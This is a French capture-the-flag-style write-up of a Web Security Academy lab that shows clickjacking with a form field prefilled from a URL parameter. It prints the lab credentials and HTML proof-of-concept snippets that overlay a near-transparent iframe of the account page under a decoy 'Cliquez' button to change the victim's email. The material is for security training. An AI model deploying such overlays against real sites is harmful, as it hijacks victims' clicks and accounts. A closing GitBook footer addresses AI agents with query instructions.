> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/clickjacking/clickjacking-with-prefilled-form-inputs.md).

# Clickjacking avec champs de formulaire préremplis via paramètre d'URL

### Clickjacking avec des données de formulaire préremplies à partir d’un paramètre d’URL

Modifiez l’adresse e-mail d’un utilisateur en tirant parti d’un formulaire sur la page du compte qui accepte un `email` paramètre dans l’URL. L’attaque consiste à afficher la page cible dans un `iframe` (presque invisible) et à encourager la victime à cliquer sur un faux élément « Cliquez ici ». Le laboratoire est résolu lorsque l’adresse e-mail du compte a été modifiée.

#### Identifiants fournis

* Utilisateur : `wiener`
* Mot de passe : `peter`
* La page de gestion du compte utilise un jeton CSRF, mais ce jeton est traité sur la même page — il n’empêche pas une mise à jour si le formulaire est soumis depuis l’intérieur du `iframe` chargé depuis le domaine cible.

<figure><img src="/files/9489205fa0eb7b66ce3e3e6b388262aaedd8a889" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/71fccdaa554b1253d8943901629da1ddf01fa03d" alt=""><figcaption></figcaption></figure>

* Il est possible de préremplir le champ e-mail en passant `?email=<valeur>` dans l’URL de la `/my-account` page. Exemple : `?email=jordan@test.com`.

<figure><img src="/files/1e9851ecef23357c6479a0936822d64201f18e86" alt=""><figcaption></figcaption></figure>

```javascript
<style>
iframe{
width: 500px;
height: 600px;
}
</style>
<iframe src="https://0aea005903313cc281be1bec00ad002d.web-security-academy.net/my-account?email=hacked@jordan.com" </iframe>
```

<figure><img src="/files/4e78af9bfcb6be90a5f372427a48a47b60875236" alt=""><figcaption></figcaption></figure>

1. Chargez la page de compte vulnérable dans un `iframe` en ajoutant le `email` paramètre avec l’adresse que vous souhaitez imposer.
2. Rendez le `iframe` presque invisible (faible opacité ou positionnement) afin de le superposer à un élément déclencheur visible sur la page d’attaque.
3. Placez un faux bouton / libellé « Cliquez » que la victime cliquera, et qui correspond spatialement au vrai bouton « Mettre à jour l’e-mail » dans `iframe`.
4. Lorsque la victime clique, le clic est en réalité transmis au bouton du formulaire dans `iframe` et soumet le formulaire avec l’e-mail prérempli.

```html
<style>
iframe{
width: 500px;
height: 600px;
opacity: 0.01;
}
div{
position: relative;
top: 455px;
left: 80px;
}
</style>
<div>Cliquez</div>
<iframe src="https://0aea005903313cc281be1bec00ad002d.web-security-academy.net/my-account?email=hacked@jordan.com" </iframe>
```

<figure><img src="/files/4fb03a4a2fbeffa8012c02b8d5d717f840fa0bc3" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/clickjacking/clickjacking-with-prefilled-form-inputs.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
